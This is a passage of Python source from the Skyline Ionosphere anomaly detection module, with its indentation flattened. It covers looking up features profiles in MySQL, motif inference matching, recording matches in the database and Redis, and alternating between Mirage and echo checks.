# data side. Ionosphere was put together backwards, like tsfresh was
# learnt. It was the people input first here in many ways, which is
        # exactly how it was supposed to be.
# This is now the Ionosphere meat.
# Get a MySQL engine only if not training_metric
if not training_metric:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20170101 - Feature #1836: ionosphere - local features profiles disk cache
# Cache fp ids for 300 seconds?
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
            # left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
logger.info('getting MySQL engine')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to get fp_ids')
if not engine:
logger.error('error :: engine not obtained to get fp_ids')
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_table meta for %s' % base_name)
# Determine the fp_ids that exist for the metric
fp_ids = []
fp_ids_found = False
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids so that we can handle multiple durations and not
# error and reminds me of the needed metrics by FULL_DURATION
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
all_fp_ids = []
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
            # the generations values available in it.
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = None
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly.
            # Set result to None here to fix an interpolation error below
result = None
fp_layers_ids = []
fp_layers_present = False
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# After the features profile evaluations this fps_db_object will
# be used to determine what settings.FULL_DURATION features
# profiles need to be created for ionosphere_echo
fps_db_object = None
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# Set both fp_count_with_echo and fp_count to 0 initially so that
# if the are echo fps, then the database can be updated with the
# fp_count_with_echo value for fp_count in the ionosphere_matched
# table
fp_count = 0
fp_count_with_echo = 0
try:
connection = engine.connect()
# @modified 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# Order by the latest features profile, this also results in the
# layers ids being ordered by latest too.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id)
# @modified 20210429 - Feature #4014: Ionosphere - inference
# Task #2446: Optimize Ionosphere
# For efficiency order by the last fp matched, if there are
                # multiple features profiles and one matches, chances are
                # that the metric may be sent through multiple times over
                # a period. When a features profile matches, chances are it
# will match again multiple times for that incident period.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.id))
stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.last_matched))
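                # The statement above is roughly equivalent to the SQL
                #   SELECT * FROM ionosphere WHERE metric_id = <metrics_id>
                #   ORDER BY last_matched DESC
                # (a sketch for clarity only, the actual SQL is generated by
                # SQLAlchemy)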
result = connection.execute(stmt)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# To be used for ionosphere_echo
fps_db_object = [{column: value for column, value in rowproxy.items()} for rowproxy in result]
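                # fps_db_object is a list of dicts, one per features profile
                # row, keyed by the ionosphere table column names, e.g.
                # (hypothetical values)
                # {'id': 1, 'metric_id': 2, 'full_duration': 86400,
                #  'enabled': 1, 'deleted': 0, 'layers_id': 0, 'generation': 0, ...}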
# for row in result:
for row in fps_db_object:
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
fp_id = row['id']
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly
fp_layers_id = int(row['layers_id'])
if fp_layers_id > 0:
fp_layers_present = True
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# Only add the fp_layers_id if > 0
# fp_layers_ids.append(fp_layers_id)
if fp_layers_id > 0:
if fp_layers_id not in fp_layers_ids:
fp_layers_ids.append(fp_layers_id)
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids
all_fp_ids.append(int(fp_id))
if int(row['full_duration']) == int(full_duration):
# @modified 20170116 - Feature #1854: Ionosphere learn - generations
# Handle ionosphere_learn
if added_by != 'ionosphere_learn':
fp_ids.append(int(fp_id))
logger.info('using fp id %s matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
else:
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is were to match. Ionosphere learn is
# limited here on generation.
# Set the default as max e.g. not allowed
current_fp_generation = int(metric_max_generations)
try:
current_fp_generation = row['generation']
if int(current_fp_generation) < int(metric_max_generations):
fp_ids.append(int(fp_id))
logger.info(
'valid ionosphere_learn generation %s - fp id %s matched full_duration %s - %s' % (
str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
else:
logger.info(
'ionosphere_learn cannot check due to max_generations of %s would be exceeded, current generation %s - fp id %s matched full_duration %s - %s' % (
str(metric_max_generations), str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: ionosphere_learn check could not determine the fp generation of fp id %s from the row object for %s' % (
str(fp_id), base_name))
else:
# @modified 20200717 - Bug #3382: Prevent ionosphere.learn loop edge cases
# Added the fp full_duration for clarity sake
# logger.info('not using fp id %s not matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
logger.info('not using fp id %s of full_duration %s as does not match full_duration %s - %s' % (
str(fp_id), str(row['full_duration']), str(full_duration), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available throughout
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = row
connection.close()
fp_count = len(fp_ids)
logger.info('determined %s fp ids for %s' % (str(fp_count), base_name))
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = len(fp_layers_ids)
logger.info('determined %s layers ids for %s' % (str(fp_layers_count), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine fp ids from DB for %s' % base_name)
fp_count = 0
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = 0
# @added 20170306 - Feature #1960: ionosphere_layers
# Corrected the interpolation of the fp_ids_db_object above where it
# was set to the last row only, however it was not used anyway.
# Here we go, let us TEACH you properly. We only evaluate
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# if result:
# fp_ids_db_object = result
if len(fp_ids) == 0:
logger.info('there are no fp ids that match full duration for %s' % base_name)
# @added 20200908 - Feature #3734: waterfall alerts
# If any layers are found but any fps for analysis have been
# discarded because of echo rate limiting or they do not match
                # the full duration, still check any enabled layers
if fp_layers_count:
logger.info('there are %s fp layers for %s' % (str(fp_layers_count), base_name))
fp_ids_found = True
else:
fp_ids_found = True
# TODO
# @added 20210814 - Feature #4232: ionosphere_shared features profiles
# Get the fp_ids from the ionosphere_shared table and append them
# to the fp_ids. Consider layers and echo fps
# Considerations
# * layers
# * echo fps, specifically in the creation, so that the same ionosphere_shared entries are created for echo fps
# TODO
if not fp_ids_found:
logger.info('no fp ids were found for %s at %s' % (base_name, str(full_duration)))
# @modified 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Use all_fp_ids so that we can handle multiple durations
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if len(all_fp_ids) == 0:
logger.error('error :: Ionosphere is enabled on %s but has no feature_profiles' % (base_name))
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# If there are no features profiles enabled for the metric
# send it back to the source to alert and update the DB with
# ionosphere_enabled=0, it has been willy nillied, all its
# fps have been disabled. This has the ramification that
# any layers the metric has will be disabled as well
if added_by != 'ionosphere_learn':
logger.info('%s has been willy nillied, all its features profiles have been disabled, but it is still flagged as ionosphere_enabled' % (base_name))
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(cache_key, 300, str(cache_key_value))
# logger.info('added Redis alert key - %s - %s' % (
# cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# Update DB as to the fact that the metric is an ionosphere
# metric, all its fps have been disabled, it has been willy
# nillied
try:
metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine)
logger.info(log_msg)
                        logger.info('metrics_table OK')
connection = engine.connect()
connection.execute(
metrics_table.update(
metrics_table.c.id == metrics_id).
values(ionosphere_enabled=0))
connection.close()
logger.info('updated %s to ionosphere_enabled=0' % (
base_name))
logger.info('%s has been unwilly nillied' % (base_name))
except:
logger.error(traceback.format_exc())
                        logger.error('error :: could not update ionosphere_enabled for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
else:
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20200930 - Feature #3734: waterfall alerts
# Send to Panorama as Mirage and Analyzer will not.
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
# @added 20161221 - TODO: why not calculate the features of every
        # anomaly so that the user does not have to do it and wait for the
# features to be calculated.
# Check the features were calculated by the webapp
calculated_feature_file = '%s/%s.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
calculated_feature_file_found = False
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# ionosphere_learn should always provide the features profile csv
# Ionosphere does not create features profiles for learn, it only
# checks them.
# Here we go! Learn!
if added_by == 'ionosphere_learn':
if not calculated_feature_file_found:
logger.error('error :: no ionosphere_learn calculated_feature_file file found - %s' % calculated_feature_file)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
if training_metric:
                # Allow time for Graphite resources to be created. If they are
                # not there, an alert was not sent, therefore features do not
                # need to be calculated
check_time = int(time())
check_age = check_time - int(added_at)
if check_age < 5:
sleep(5)
graphite_file_count = len([f for f in os.listdir(metric_training_data_dir)
if f.endswith('.png') and os.path.isfile(os.path.join(metric_training_data_dir, f))])
if graphite_file_count == 0:
logger.info('not calculating features no anomaly Graphite alert resources created in %s' % (metric_training_data_dir))
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
else:
logger.info('anomaly Graphite alert resources found in %s' % (metric_training_data_dir))
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
matched_motifs = {}
fps_checked_for_motifs = []
# @modified 20210426 - Feature #4014: Ionosphere - inference
# Do not run inference on ionosphere_learn jobs
if not training_metric and not added_by == 'ionosphere_learn':
if IONOSPHERE_INFERENCE_MOTIFS_ENABLED and fp_ids:
try:
logger.info('calling inference to find matching similar motif')
start_inference = timer()
matched_motifs, fps_checked_for_motifs = ionosphere_motif_inference(base_name, metric_timestamp)
end_inference = timer()
logger.info('inference found %s matching similar motifs, checked %s fps in %6f seconds' % (
str(len(matched_motifs)), str(len(fps_checked_for_motifs)),
(end_inference - start_inference)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed calling ionosphere_motif_inference - %s' % e)
matched_motifs = {}
fps_checked_for_motifs = []
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
# Update the motif related columns of all the ionosphere fps
# that where checked
if len(fps_checked_for_motifs) > 0:
motif_checked_timestamp = int(time())
motif_checks_updated_count = 0
for fp_checked_for_motifs in fps_checked_for_motifs:
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_checked_for_motifs).
values(motif_checked_count=ionosphere_table.c.motif_checked_count + 1,
motif_last_checked=motif_checked_timestamp))
connection.close()
motif_checks_updated_count += 1
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update motif_checked_count and motif_last_checked for %s - %s' % (str(fp_checked_for_motifs), e))
logger.info('updated the motif_checked_count column and the motif_last_checked column to %s in ionosphere for %s fps' % (
str(motif_checked_timestamp), str(motif_checks_updated_count)))
if matched_motifs:
# Here we should update DB, clean up and return before incurring any
# features profiles calculations (unless in testing mode)
ordered_matched_motifs = []
matching_motif = []
for motif_id in list(matched_motifs.keys()):
try:
motif_metric_id = matched_motifs[motif_id]['metric_id']
motif_fp_id = matched_motifs[motif_id]['fp_id']
motif_fp_index = matched_motifs[motif_id]['index']
motif_dist = matched_motifs[motif_id]['distance']
motif_size = matched_motifs[motif_id]['size']
motif_matched_timestamp = matched_motifs[motif_id]['timestamp']
match_type_id = matched_motifs[motif_id]['type_id']
match_type = matched_motifs[motif_id]['type']
motif_sequence = matched_motifs[motif_id]['motif_sequence']
# @added 20210423 - Feature #4014: Ionosphere - inference
# Compute the area using the composite trapezoidal rule.
try:
motif_area = matched_motifs[motif_id]['motif_area']
except Exception as e:
dev_null = e
motif_area = 0
try:
fp_motif_area = matched_motifs[motif_id]['fp_motif_area']
except Exception as e:
dev_null = e
fp_motif_area = 0
# @added 20210427 - Feature #4014: Ionosphere - inference
# Compute the area using the composite trapezoidal rule.
try:
area_percent_diff = matched_motifs[motif_id]['area_percent_diff']
except Exception as e:
dev_null = e
area_percent_diff = 0
# @added 20210428 - Feature #4014: Ionosphere - inference
# Add time taken and fps checked
try:
fps_checked = matched_motifs[motif_id]['fps_checked']
except Exception as e:
dev_null = e
fps_checked = 0
try:
runtime = matched_motifs[motif_id]['runtime']
except Exception as e:
dev_null = e
runtime = 0
ordered_matched_motifs.append([motif_metric_id, motif_fp_id, motif_fp_index, motif_dist, motif_size, motif_matched_timestamp, match_type_id, match_type, motif_sequence, motif_area, fp_motif_area, area_percent_diff, fps_checked, runtime])
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine ordered_matched_motifs item')
# Sort by the best dist
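# ordered_matched_motifs items are laid out as
# [metric_id, fp_id, index, distance, size, timestamp, type_id, type,
#  motif_sequence, motif_area, fp_motif_area, area_percent_diff,
#  fps_checked, runtime], so sorting on x[3] orders the matches by the
# smallest distance first and the best (most similar) motif is item 0.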
if ordered_matched_motifs:
sorted_matched_motifs = sorted(ordered_matched_motifs, key=lambda x: x[3])
matching_motif = sorted_matched_motifs[0]
if matching_motif:
if not IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY:
redis_set = 'ionosphere.not_anomalous'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
redis_set = 'ionosphere.features_profiles_checked'
data = str(matching_motif[1])
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# Add all motif_matches to the DB
try:
motifs_matched_table, log_msg, trace = motifs_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('motifs_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get motifs_matched_table meta for %s' % base_name)
# @added 20210414 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
# Store the not anomalous motifs
try:
not_anomalous_motifs_table, log_msg, trace = not_anomalous_motifs_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('not_anomalous_motifs_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get not_anomalous_motifs_table meta for %s' % base_name)
new_motifs_matched_ids = []
for matched_motif in ordered_matched_motifs:
primary_match = 0
if matching_motif == matched_motif:
primary_match = 1
# Only a single ionosphere_matched record is created for
# the most similar motif (primary_match=1) HOWEVER
# DO NOTE that EVERY motif match that is surfaced
# in a run is recorded in the motifs_matched table.
# ordered_matched_motifs.append([motif_metric_id, motif_fp_id, motif_fp_index, motif_dist, motif_size, motif_matched_timestamp, match_type_id, match_type, motif_sequence, motif_area, fp_motif_area, area_percent_diff])
try:
connection = engine.connect()
ins = motifs_matched_table.insert().values(
metric_id=int(matched_motif[0]),
fp_id=int(matched_motif[1]),
metric_timestamp=int(matched_motif[5]),
primary_match=primary_match,
index=int(matched_motif[2]),
size=int(matched_motif[4]),
distance=float(matched_motif[3]),
type_id=int(matched_motif[6]),
# @added 20210427 - Feature #4014: Ionosphere - inference
# Compute the area using the composite trapezoidal rule.
motif_area=float(matched_motif[9]),
fp_motif_area=float(matched_motif[10]),
area_percent_diff=float(matched_motif[11]),
# @added 20210428 - Feature #4014: Ionosphere - inference
# Add time taken and fps checked
fps_checked=int(matched_motif[12]),
runtime=float(matched_motif[13]))
result = connection.execute(ins)
connection.close()
new_motif_matched_id = result.inserted_primary_key[0]
new_motifs_matched_ids.append(new_motif_matched_id)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not insert motifs_matched record into DB: %s' % str(matched_motif))
# @added 20210414 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
# Store the not anomalous motifs
# @modified 20210419 - Feature #4014: Ionosphere - inference
# Only store motif data in the database if specifically
# enabled, inference.matched_motifs.dict file is always
# saved to the training_data dir
if new_motif_matched_id and IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS:
new_motif_sequence_ids = []
try:
connection = engine.connect()
for motif_sequence_timestamp, motif_sequence_value in matched_motif[8]:
try:
ins = not_anomalous_motifs_table.insert().values(
motif_id=int(new_motif_matched_id),
timestamp=int(motif_sequence_timestamp),
value=motif_sequence_value)
result = connection.execute(ins)
new_motif_sequence_id = result.inserted_primary_key[0]
new_motif_sequence_ids.append(new_motif_sequence_id)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not insert %s, %s into not_anomalous_motifs for matched_motif_id: %s' % (
str(motif_sequence_timestamp),
str(motif_sequence_value),
str(new_motif_matched_id)))
connection.close()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not insert timestamps and values for into not_anomalous_motifs table: %s' % (
str(new_motif_matched_id)))
logger.info('inserted %s new motif sequence records into the not_anomalous_motifs table for matched_motif_id: %s' % (
str(len(new_motif_sequence_ids)), str(new_motif_matched_id)))
# If in testing mode no ionosphere tables are updated
if not IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY:
if matching_motif == matched_motif:
# Only a single ionosphere_matched record is created for
# the most similar motif (primary_match=1) HOWEVER
# DO NOTE that EVERY motif match that is surfaced
# in a run is recorded in the motifs_matched table.
new_matched_id = 0
try:
connection = engine.connect()
ins = ionosphere_matched_table.insert().values(
fp_id=int(matching_motif[1]),
metric_timestamp=int(matching_motif[5]),
motifs_matched_id=int(new_motif_matched_id))
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
logger.info('new ionosphere_matched id: %s (for matched motif with matched_motif_id: %s)' % (
str(new_matched_id), str(new_motif_matched_id)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not create ionosphere_matched record for fp id %s and motif match with id %s for matching_motif: %s' % (
str(fp_id), str(new_motif_matched_id),
str(matching_motif)))
# ONLY the fp of the most similar motif match gets recorded as
# having been checked and matched
if new_matched_id:
# Update motif_matched_count in ionosphere_table
motif_matched_timestamp = int(time())
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == matching_motif[1]).
values(motif_matched_count=ionosphere_table.c.motif_matched_count + 1,
motif_last_matched=motif_matched_timestamp))
connection.close()
logger.info('updated motif_matched_count and motif_last_matched for fp_id %s due to matched_motif_id: %s' % (
str(matching_motif[1]), str(new_matched_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update motif_matched_count and motif_last_matched for fp_id %s due to matched_motif_id: %s' % (
str(matching_motif[1]), str(new_matched_id)))
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous.
try:
add_not_anomalous_to_redis_hash(base_name, metric_timestamp, anomalous_value, full_duration)
except Exception as e:
logger.error('error :: failed calling add_not_anomalous_to_redis_hash - %s' % e)
if not IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(matching_motif[1]))
logger.info('added matched fp_id %s - %s' % (
str(matching_motif[1]), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: adding motif matched fp_id %s - %s' % (
str(matching_motif[1]), profile_id_matched_file))
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# Continue with normal features profile matching if no motifs were matched
context = skyline_app
f_calc = None
if not calculated_feature_file_found:
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
if f_calc:
send_metric_name = '%s.features_calculation_time' % skyline_app_graphite_namespace
f_calc_time = '%.2f' % float(f_calc)
try:
send_graphite_metric(skyline_app, send_metric_name, f_calc_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send features_calculation_time metric to Graphite')
if training_metric:
logger.info('training metric done')
# @added 20200908 -
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
# TODO: make ionosphere more useful, compare any other
# available training_metric profiles here and match, not in the
# db context, in the training context.
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
logger.error('error :: calculated features file not available - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20161213 - Branch #1790: test_tsfresh
# TODO: Match the test_tsfresh method
# Create an array of the calculated features
calculated_features = []
if calculated_feature_file_found:
calculated_features = get_calculated_features(calculated_feature_file)
if len(calculated_features) == 0:
logger.error('error :: no calculated features were determined from - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('%s calculated features determined' % (str(len(calculated_features))))
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked = 0
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = 0
layers_checked_count = 0
# @added 20190314 - Feature #2484: FULL_DURATION feature profiles
# Here we add the bifurcation to also create a features
# profile at FULL_DURATION for all Mirage metrics. With a
# view to increase the number of matches trained metric
# achieve by also allowing for the creation and comparing of
# the FULL_DURATION features profiles as well.
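# In practice this means a Mirage metric can be matched either against
# its Mirage duration features profiles or against FULL_DURATION echo
# features profiles, for example (with common settings) a 7 day Mirage
# duration profile and a 24 hour FULL_DURATION echo profile created
# from the same training data.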
echo_check = False
echo_calculated_feature_file = False
echo_calculated_feature_file_found = False
echo_calculated_features = []
echo_fp_ids = []
echo_anomalous_timeseries = None
if added_by == 'mirage':
try:
echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
echo_enabled = False
if echo_enabled:
echo_check = True
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
# Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# In the batch processing context do not apply the alternation between
# normal Ionosphere Mirage features profile checks and Ionosphere echo
# features profile checks when ionosphere_busy is set to True as it
# results in false positives on batch processing metrics where one check
# matches and the next does not, then the next does.
batch_metric = False
if echo_check and BATCH_PROCESSING:
# Batch processing metric
try:
batch_metric = is_batch_metric(skyline_app, base_name)
except:
batch_metric = False
if batch_metric and ionosphere_busy:
ionosphere_busy = False
logger.info('batch processing metric, ionosphere_busy has been changed from True to False to prevent switching between Mirage and echo fps')
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 4 metric check files, alternate between normal
# Ionosphere Mirage features profile checks and Ionosphere echo features
# profile checks.
if echo_check:
if ionosphere_busy:
# Check the ionosphere_echo metric Redis keys to see which check
# to run, ionosphere or ionosphere_echo. If Ionosphere is busy,
# Ionosphere will alternate between normal Ionosphere features
# profiles (Mirage duration) and Ionosphere echo features
# profiles (FULL_DURATION) comparison.
echo_ionosphere_check_cache_key = 'ionosphere_echo.ionosphere.check.%s' % base_name
echo_ionosphere_check_key = False
try:
echo_ionosphere_check_key = self.redis_conn.get(echo_ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
echo_ionosphere_echo_check_cache_key = 'ionosphere_echo.echo.check.%s' % base_name
echo_ionosphere_echo_check_key = False
try:
echo_ionosphere_echo_check_key = self.redis_conn.get(echo_ionosphere_echo_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
create_ionosphere_echo_check_key = False
remove_ionosphere_echo_check_key = False
# If neither the ionosphere nor the ionosphere_echo key exists,
# only check ionosphere
if not echo_ionosphere_check_key:
if not echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
# If the ionosphere_echo key exists, the echo checks were run last
# time, so only run the normal Mirage feature profile checks this time
if echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
# If the ionosphere check key exists, the Mirage feature profiles were
# checked last time, so only run the ionosphere_echo checks this time
if echo_ionosphere_check_key:
echo_check = True
logger.info('ionosphere_busy - skipping the normal Mirage feature profiles checks as run last time and running ionosphere_echo checks this time')
# Remove the Mirage features profile ids from fp_ids so that only
# the echo fps are checked
fp_ids = []
logger.info('ionosphere_busy - removed %s Mirage feature profile ids from fp_ids' % str(fp_count))
create_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
if remove_ionosphere_echo_check_key:
try:
self.redis_conn.delete(remove_ionosphere_echo_check_key)
logger.info(
'deleted Redis check key - %s' % (remove_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to delete Redis check key - %s' % (remove_ionosphere_echo_check_key))
if create_ionosphere_echo_check_key:
try:
key_created_at = int(time())
self.redis_conn.setex(
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# create_ionosphere_echo_check_key, 300, [key_created_at])
create_ionosphere_echo_check_key, 300, key_created_at)
logger.info(
'created Redis check key - %s' % (create_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to create Redis check key - %s' % (create_ionosphere_echo_check_key))
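# These check keys are created with a 300 second TTL, so the
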